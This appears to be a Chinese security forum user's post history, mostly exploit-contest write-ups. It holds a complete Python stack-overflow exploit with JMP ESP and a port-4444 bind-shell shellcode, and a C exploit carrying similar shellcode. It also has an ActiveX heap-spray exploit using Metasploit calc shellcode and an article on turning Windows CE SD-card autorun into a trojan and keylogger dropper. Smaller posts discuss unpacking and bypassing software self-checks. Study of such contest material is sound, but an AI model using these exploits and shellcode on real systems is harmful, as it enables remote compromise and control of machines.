|
[原创]一种Windows CE 平台AutoRun程序的实现方法
这么老的东西还叫原创啊。 http://www.informit.com/guides/content.aspx?g=security&seqNum=91 Windows Mobile Autorun Last updated Nov 25, 2004. Almost any user, from the most experienced to the complete beginner, knows that when you place a game or application CD in the computer it will automatically launch a program that allows you to interact with the data on the disk. This is a result of a magically concept known as the autorun. The autorun has some definite advantages. It simplifies the installation routine by automating the necessary steps to unpack and execute files on the inserted media. By doing this, the user is kept at an abstract level from the actual data, which is arguably a good thing for many of the computer users in the world. In general, the more the computer automagically operates, the happier the user. Unfortunately, the simple fact that an autorun process executes a program WITHOUT user interaction is a security nightmare. There is no guarantee that the programs processed by the autorun are actually safe. They could just as easily contain malicious code as they could the launcher for Doom 3. Not to mention the program executed by the autorun may run hidden and give no indication it has executed. This is where the true danger lies. To compound the autorun threat even more, CD-ROMs are not the only form of media that can automatically trigger a program to launch. External hard drives, USB thumb drives, DVDs, and more can elicit a program execution. So, thanks to the combination of providing the end user with a brainless computer experience with the increasingly connected and integrated computer, we now have yet another vector by which viruses, trojans, and other forms of malware can be transmitted. Oh, and all this not only applies to the desktop PC, but it also applies to mobile devices, such as PDAs and cell phones. The PDA Threat The PDA is a great tool. However, it is one of the most highly underestimated computer devices on the market. Most people see a PDA and think of a digital day timer. They recognize it is a mini-computer of sorts, but fail to realize that though the size of the device might be small, the computing power contained inside is basically the same of a computer purchased in 1996-1998, and in some cases more powerful. In today's PDA, you can find up to 256MB of built in memory, a 624mhz processor, built-in 802.11 & Bluetooth wireless connectivity, plus the ability to plug in external drives, run multiple operating systems, and more. While the resources available on the PDA speak to their potential, the programs these devices can run further illustrate their power. Word, Excel, games, Power Point, FTP servers, web servers, email server, full ssh daemons and more run on these devices. In fact, with the Familiar Linux operating system installed, it is hard to tell a PDA from a regular computer when connected remotely (granted data space, memory allocation, and other hardware specifics will give it away to the curious user). With all this power and storage ability, an attacker may consider the PDA a target too good to pass up. The question is then, how can an attacker gain access to and install any malicious programs that can help achieve their goal. This is where the power of the autorun can come in handy. To illustrate, how often do you see a PDA user on a subway or in a coffee shop? What would happen if you sat next to this user, pulled out your PDA and started up a conversation about how your PDA rocks. Next pull out your Atari games SD card, and show the victim the games your PDA can play, and then offer it to them to try. Congratulations, you now own their PDA. What the victim didn't realize is when the SD card was inserted into the PDA, it automatically executed a file on the PDA that placed a trojan/backdoor in their startup folder, replaced their keyboard with a version that logs everything typed, copied out everything in their My Documents folder to the SD card. All this by simply inserting the innocent looking SD card into their PDA. The Detailed Threat Autorun on a PDA is not as simply to execute as it is on a desktop PC. As per the MSDN, each major brand of PDA processor is associated with a particular numerical value as defined by the winnt.h file. The number is then used as a folder naming convention, in which that processor would expect to find its personal executable. This is due to the simple fact that each processor understands a different assembly language, which means a program compiled for a StrongARM will not execute on a MIPS processor. The following list provides you with the association table. HITACHI_SH3 10003 // Windows CE HITACHI_SH3E 10004 // Windows CE HITACHI_SH4 10005 // Windows CE MOTOROLA_821 821 // Windows CE SH3 103 // Windows CE SH4 104 // Windows CE STRONGARM 2577 // Windows CE - 0xA11 ARM720 1824 // Windows CE - 0x720 ARM820 2080 // Windows CE - 0x820 ARM920 2336 // Windows CE - 0x920 ARM_7TDMI 70001 In other words, if you obtain a SD card, create this folder structure on the card, and drop a file called AUTORUN.exe inside each folder that is compiled for the appropriate processor, you can be fairly certain your AUTORUN program will be executed. To make it even more simple, the folder 2577 covers all versions of the ARM processor, from the XScale used in the newest releases from Dell and HP, to the older StrongARM used in the original iPAQs. When the media card is inserted, the autorun.exe file is actually copied to the \Windows directory on the PDA. It is then 'installed' (I.E. executed). When the media card is removed, the program is 'uninstalled', and then deleted from the \Windows folder. This has several indirect affects. One, your PDA must have the memory space needed for this program to launch, and there must not be another 'autorun.exe' program in the \Windows startup folder or it will be deleted. To demonstrate, we created the following simple program that can easily be placed on a SD card. This program can be compiled by placing the autorun.s file, make.bat file, two programs from the EVC++ package named armasm.exe and link.exe, and coredll.lib into a folder. Then double click on make.bat and autorun.s should compile and create two new files; autorun.obj and autorun.exe. Place the autorun.exe file in a folder named 2577 on your SD card, remove it and reinsert the card. You should be greeted with a popup box similar to the one in figure 10. Make.bat: armasm.exe autorun.s link.exe coredll.lib /entry:"start" /subsystem:windowsce /machine:arm autorun.obj pause autorun.s: IMPORT MessageBoxW ;Calls MessageBox function IMPORT ExitThread ;Calls ExitThread function EXPORT start ;Exports start code AREA .text, CODE start eor R0, R0, R0 ;Sets 1st parameter = 0 ldr R1, =message ;Sets 2nd parameter = message ldr R2, =msgtit ;Sets 3rd parameter = mestit mov R3, #0 ;Sets 4th parameter = MB_OK eor R4, R4, R4 ;Sets 5th parameter = 0 bl MessageBoxW ;Calls message box function eor R0, R0, R0 ;Sets R0 = 0 bl ExitThread ;Calls ExitThread ALIGN message dcb "A",0,"u",0,"t",0,"o",0,"r",0,"u",0,"n",0,0,0 msgtit dcb "A",0,"u",0,"t",0,"o",0,"r",0,"u",0,"n",0,0,0 END |
|
[原创]exploit_me_B 溢出代码
提交者看雪ID:hahar 职业:(学生、程序员、安全专家、黑客技术爱好者、其他?) 学生 漏洞定位: 使用材料中附带的ComRaider进行定位,筛选出Exception Address为41414141的漏洞进行手动调试,ComRaider测试结果显示可疑函数为 prototype = "Sub LoadPage ( ByVal URL As String , ByVal x As Long , ByVal y As Long , ByVal Zoom As Single )" memberName = "LoadPage" progid = "ppp2Lib.T_ppp01" argCount = 4 arg1=String(1044, "A") arg2=1 arg3=1 arg4=1 根据exploit_me_A报告中的方法确定百,十,个位,定位到第一个长度为260时恰好覆盖EIP 漏洞描述及危害分析: .text:10013DC0 ; =============== S U B R O U T I N E ======================================= .text:10013DC0 .text:10013DC0 ; .text:10013DC0 .text:10013DC0 sub_10013DC0 proc near ; CODE XREF: sub_10009740+38 p .text:10013DC0 ; sub_10012D10+8F p .text:10013DC0 .text:10013DC0 var_10C = byte ptr -10Ch .text:10013DC0 var_108 = dword ptr -108h .text:10013DC0 var_104 = dword ptr -104h .text:10013DC0 String = byte ptr -100h .text:10013DC0 arg_0 = dword ptr 4 .text:10013DC0 arg_4 = dword ptr 8 .text:10013DC0 .text:10013DC0 sub esp, 10Ch ; 开辟10C大小的缓冲区 .text:10013DC6 mov edx, ecx .text:10013DC8 or ecx, 0FFFFFFFFh .text:10013DCB xor eax, eax .text:10013DCD push ebx .text:10013DCE push esi .text:10013DCF push edi ;三个push ,ESP-0C .text:10013DD0 mov edi, [esp+120h] .text:10013DD7 repne scasb .text:10013DD9 not ecx .text:10013DDB sub edi, ecx .text:10013DDD lea ebx, [esp+18h] ; 拷贝目的地址从ESP+18h开始,最多容纳10C+0CH-18H=100h字节 .text:10013DE1 mov eax, ecx .text:10013DE3 mov esi, edi;ESI指向Buffer .text:10013DE5 mov edi, ebx .text:10013DE7 shr ecx, 2 .text:10013DEA rep movsd ;此处导致溢出 .text:10013DEC mov ecx, eax .text:10013DEE mov eax, [edx+3F94h] .text:10013DF4 and ecx, 3 .text:10013DF7 cmp eax, 1 .text:10013DFA rep movsb 用IDA反汇编控件,漏洞代码在100013DC0处,字符串拷贝没有没有检查源字符串长度,目的空间大小只有10C+0CH-18H=100h字节,所以当第一个参数为260个字符时刚好覆盖了EIP shellcode描述 shellcode引用自http://metasploit.com站点提供的运行计算器程序的shellcode 请注明shellcode来源:原创,修改,引用。 原创请给出开发说明 修改请给出修改说明,并注明出处,附加被引用代码 引用请给出功能描述,并注明出处,附加被引用代码 unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"); exploit运行截图 打开LoadPage.html后,计算器程序执行 稳定性与通用性论证 采用了heap spray在内存中填充大量nop+shellcode形式的内存块,溢出时将EIP覆盖到0x0d0d0d0d,此处的指令为nop+shellcode形式,执行不受操作系统版本限制,通用性好。 创新性论证(可选) 该漏洞开始试图用传统的JMPESP方法利用,结果发现内存中数据大量被修改 这是OD的内存截图,看到原来的JMPESP=”\x12\x45\xfa\x7f”被修改成”\x12\x45\xA8\xB2”;故采用Activex控件漏洞利用中的通用的且稳定的HeapSpray技术。 |
|
[原创]exploit_me_A exploit
谢谢,已上传! |
|
[原创]exploit_me_A exploit
无上传附件功能,图片和word文档无法提交 |
|
[原创]exploit_me_A exploit
Exploit_me_A.exe 分析报告 提交者看雪ID:hahar 职业:(学生、程序员、安全专家、黑客技术爱好者、其他?) 学生 1. PE分析 拿到程序,从介绍中知道是个服务器程序,直接运行,然后使用Process Explorer查看Exploit_me_A.exe监听的端口,如图1所示: 知道程序监听7777端口,接着使用python脚本发送一串A过去,看看服务器反应: #!/usr/bin/env python import socket host = "127.0.0.1" port = 7777 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #print shellcode print " buffer = "A" * 10 print " print " 服务器返回了输入的数据,初步断定是个echo的程序,输入什么就返回什么。 2. 漏洞描述 输入10个A的时候程序没有溢出,逐步加大A的数量,当A到1000时, cdb调试器报告异常(ps:使用cdb包含在windwos debug tools 工具包中,使用cdb –iae可以设置cdb为异常处理的调试器) 由此可以看到服务器程序在处理用户输入的数据时存在异常,导致溢出,从调试器上看正在执行41414141,显然是我们输入的A,下一步要精确定为溢出点,这里可以采用二分法(逐步用500,250,125长度去测试)或者百、十、个位定位法定位。这里采用第二种方法。 修改python程序 buffer = "” li = ["A","B","C","D","E","F","G","H","I","J"] for ch in li: buffer += ch *100 从结果看到是字符”C”覆盖了EIP,由此确定溢出长度在200~300之间,继续定位十位 buffer = "a"*200 li = ["A","B","C","D","E","F","G","H","I","J"] for ch in li: buffer += ch *10 从调试器看到字符A覆盖了EIP,于是确定覆盖长度在200~210,同理定位个位 buffer = "a"*200 li = ["A","B","C","D","E","F","G","H","I","J"] for ch in li: buffer += ch *1 从结果看,从201~204覆盖了EIP。下面就可以构造exploit了。 Buffer = A*200+JMPESP+NOP*20+Shellcode 这里可以看到NOP我用了20,其实只要大于函数返回是减去的个数就可以了,NOP指令不影响shellocde执行。JMPESP采用中文平台下通用的JMPESP = "\x12\x45\xFA\x7F" 3.shellcode功能 我是个懒人,直接从http://metasploit.com:55555/PAYLOADS?FILTER=win32站点上进行定制 选择windows bind shell,产生一个监听4444端口的shellcode 4.稳定性与通用性 由于程序中的JMPESP地址适用所有的中文操作系统,shellcode也是动态定位API地址,具有很好的稳定性与通用性。 4.exploit运行成功截图 可以看到4444端口正在监听。 5.exploit #!/usr/bin/env python import socket host = "127.0.0.1" port = 7777 JMPESP = "\x12\x45\xFA\x7F" #监听4444端口 shellcode="\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbe" shellcode+="\x6b\xb2\x91\x83\xeb\xfc\xe2\xf4\x42\x01\x59\xdc\x56\x92\x4d\x6e" shellcode+="\x41\x0b\x39\xfd\x9a\x4f\x39\xd4\x82\xe0\xce\x94\xc6\x6a\x5d\x1a" shellcode+="\xf1\x73\x39\xce\x9e\x6a\x59\xd8\x35\x5f\x39\x90\x50\x5a\x72\x08" shellcode+="\x12\xef\x72\xe5\xb9\xaa\x78\x9c\xbf\xa9\x59\x65\x85\x3f\x96\xb9" shellcode+="\xcb\x8e\x39\xce\x9a\x6a\x59\xf7\x35\x67\xf9\x1a\xe1\x77\xb3\x7a" shellcode+="\xbd\x47\x39\x18\xd2\x4f\xae\xf0\x7d\x5a\x69\xf5\x35\x28\x82\x1a" shellcode+="\xfe\x67\x39\xe1\xa2\xc6\x39\xd1\xb6\x35\xda\x1f\xf0\x65\x5e\xc1" shellcode+="\x41\xbd\xd4\xc2\xd8\x03\x81\xa3\xd6\x1c\xc1\xa3\xe1\x3f\x4d\x41" shellcode+="\xd6\xa0\x5f\x6d\x85\x3b\x4d\x47\xe1\xe2\x57\xf7\x3f\x86\xba\x93" shellcode+="\xeb\x01\xb0\x6e\x6e\x03\x6b\x98\x4b\xc6\xe5\x6e\x68\x38\xe1\xc2" shellcode+="\xed\x38\xf1\xc2\xfd\x38\x4d\x41\xd8\x03\xa3\xcd\xd8\x38\x3b\x70" shellcode+="\x2b\x03\x16\x8b\xce\xac\xe5\x6e\x68\x01\xa2\xc0\xeb\x94\x62\xf9" shellcode+="\x1a\xc6\x9c\x78\xe9\x94\x64\xc2\xeb\x94\x62\xf9\x5b\x22\x34\xd8" shellcode+="\xe9\x94\x64\xc1\xea\x3f\xe7\x6e\x6e\xf8\xda\x76\xc7\xad\xcb\xc6" shellcode+="\x41\xbd\xe7\x6e\x6e\x0d\xd8\xf5\xd8\x03\xd1\xfc\x37\x8e\xd8\xc1" shellcode+="\xe7\x42\x7e\x18\x59\x01\xf6\x18\x5c\x5a\x72\x62\x14\x95\xf0\xbc" shellcode+="\x40\x29\x9e\x02\x33\x11\x8a\x3a\x15\xc0\xda\xe3\x40\xd8\xa4\x6e" shellcode+="\xcb\x2f\x4d\x47\xe5\x3c\xe0\xc0\xef\x3a\xd8\x90\xef\x3a\xe7\xc0" shellcode+="\x41\xbb\xda\x3c\x67\x6e\x7c\xc2\x41\xbd\xd8\x6e\x41\x5c\x4d\x41" shellcode+="\x35\x3c\x4e\x12\x7a\x0f\x4d\x47\xec\x94\x62\xf9\x4e\xe1\xb6\xce" shellcode+="\xed\x94\x64\x6e\x6e\x6b\xb2\x91" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #print shellcode print " #buffer = "a"*200 #li = ["A","B","C","D","E","F","G","H","I","J"] #for ch in li: # buffer += ch *1 #print buffer buffer = "A" * 200 +JMPESP+"\x90"*20+shellcode #buffer = "A" * 1000 print " print " |
|
[原创]请教一下exploit的问题?
原因的确比较蹊跷,不过我改了一下jmp_back,倒是跳转成功了,至于原因还没搞明白. 下面是测试代码。 #include "stdio.h" #include "stdlib.h" #include "winsock2.h" #pragma comment(lib,"Ws2_32") int sock; //char jmp_2000esp[]="\x28\x7f\xe7\x77"; char jmp_esp[]="\x12\x45\xFa\x7f"; char buffer[1024]; char jmp_back[]="\xb9\x41\x41\x41\x25\xc1\xe9\x14\x2b\xe1\xff\xe4"; char shellcode[]= //监听4444端口 "\xeb\x10\x5b\x4b\x33\xc9\x66\xb9\x23\x01\x80\x34\x0b\xf8\xe2\xfa" "\xeb\x05\xe8\xeb\xff\xff\xff\x11\x01\xf8\xf8\xf8\xa7\x9c\x59\xc8" "\xf8\xf8\xf8\x73\xb8\xf4\x73\x88\xe4\x55\x73\x90\xf0\x73\x0f\x92" "\xfb\xa1\x10\x61\xf8\xf8\xf8\x1a\x01\x90\xcb\xca\xf8\xf8\x90\x8f" "\x8b\xca\xa7\xac\x07\xee\x73\x10\x92\xfd\xa1\x10\x78\xf8\xf8\xf8" "\x1a\x01\x79\x14\x68\xf9\xf8\xf8\xac\x90\xf9\xf9\xf8\xf8\x07\xae" "\xf4\xa8\xa8\xa8\xa8\x92\xf9\x92\xfa\x07\xae\xe8\x73\x20\xcb\x38" "\xa8\xa8\x90\xfa\xf8\xe9\xa4\x73\x34\x92\xe8\xa9\xab\x07\xae\xec" "\x92\xf9\xab\x07\xae\xe0\xa8\xa8\xab\x07\xae\xe4\x73\x20\x90\x9b" "\x95\x9c\xf8\x75\xec\xdc\x7b\x14\xac\x73\x04\x92\xec\xa1\xcb\x38" "\x71\xfc\x77\x1a\x03\x3e\xbf\xe8\xbc\x06\xbf\xc4\x06\xbf\xc5\x71" "\xa7\xb0\x71\xa7\xb4\x71\xa7\xa8\x75\xbf\xe8\xaf\xa8\xa9\xa9\xa9" "\x92\xf9\xa9\xa9\xaa\xa9\x07\xae\xfc\xcb\x38\xb0\xa8\x07\xae\xf0" "\xa9\xae\x73\x8d\xc4\x73\x8c\xd6\x80\xfb\x0d\xae\x73\x8e\xd8\xfb" "\x0d\xcb\x31\xb1\xb9\x55\xfb\x3d\xcb\x23\xf7\x46\xe8\xc2\x2e\x8c" "\xf0\x39\x33\xff\xfb\x22\xb8\x13\x09\xc3\xe7\x8d\x1f\xa6\x73\xa6" "\xdc\xfb\x25\x9e\x73\xf4\xb3\x73\xa6\xe4\xfb\x25\x73\xfc\x73\xfb" "\x3d\x53\xa6\xa1\x3b\x10\xfa\x07\x07\x07\xca\x8c\x69\xf4\x31\x44" "\x5e\x93\x77\x0a\xe0\x99\xc5\x92\x4c\x78\xd5\xca\x80\x26\x9c\xe8" "\x5f\x25\xf4\x67\x2b\xb3\x49\xe6\x6f\xf9"; int main(int argc, char* argv[]) { memset(buffer,0x90,1024); memcpy(&buffer[280],shellcode,314); //memcpy(&buffer[604],jmp_2000esp,4); memcpy(&buffer[604],jmp_esp,4); memcpy(&buffer[608],jmp_back,12); struct sockaddr_in server; WSADATA ws; WSAStartup(MAKEWORD(2,2),&ws); sock=socket(AF_INET,SOCK_STREAM,0); server.sin_family=AF_INET; server.sin_port=htons(3764); server.sin_addr.s_addr=inet_addr("127.0.0.1"); connect(sock,(struct sockaddr*)&server,sizeof(server)); send(sock,buffer,sizeof(buffer),0); closesocket(sock); return 0; } |
|
[原创]请教一下exploit的问题?
看懂你的意思了,理论上是没有问题的,让你贴下代码是想调试一下,看看内存中数据是否有变化。 |
|
[原创]请教一下exploit的问题?
把代码贴一下,一调试就知道问题了。 |
|
[转帖]IDA introduces full decompilation (to source code, yes)
已经有demo出来了 http://hexblog.com/decompilation/video/vd1.html |
|
vc++6.0下生成的汇编代码,谁帮我解释一下
楼主帖的内容就是VC生成啊,对应的汇编的地方有C代码啊 |
|
OD的“运行跟踪”结果如何保存?[求助]
搞定,谢谢版主指点! |
|
问题:xp 下安装softice 后鼠标不响应 ?
问题可能出在你的操作系统的版本,番茄花园的xp+sp2,安装softice好像会有这种问题。 |
|
|
|
[原创]常见自校检分析实例
就是这个版本,不要被表明现象迷惑,用“primary Learner用户” 登陆,然后点“新课”,可以看到没有任何反应, 状态栏提示“运行错误:Ver7.05 TApplication-> Access violation at address 004F1DD3 in moudule" 可以用PEID查一下脱壳后的版本,会发现MD5加密算法 |
|
[原创]常见自校检分析实例
建议楼主看看最新版的“CJC好玩背单词”,在这里只谈脱壳,不谈破解(早期的版本是不加壳的),谢谢! |
|
SmartCheck 你在哪啊,我寻找了整个互联网,也没找到.....
这个好像也是一个未注册的版本。 |
|
[原创]常见自校检分析实例
Delphi程序可以试着用eXeScope修改RC数据中的相应控件中Enabled项,将FALSE改为TRUE 菜单是可用的,只是点击后,状态栏提示异常. 昨晚用第一种方法跟了好久,还是搞不定. |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值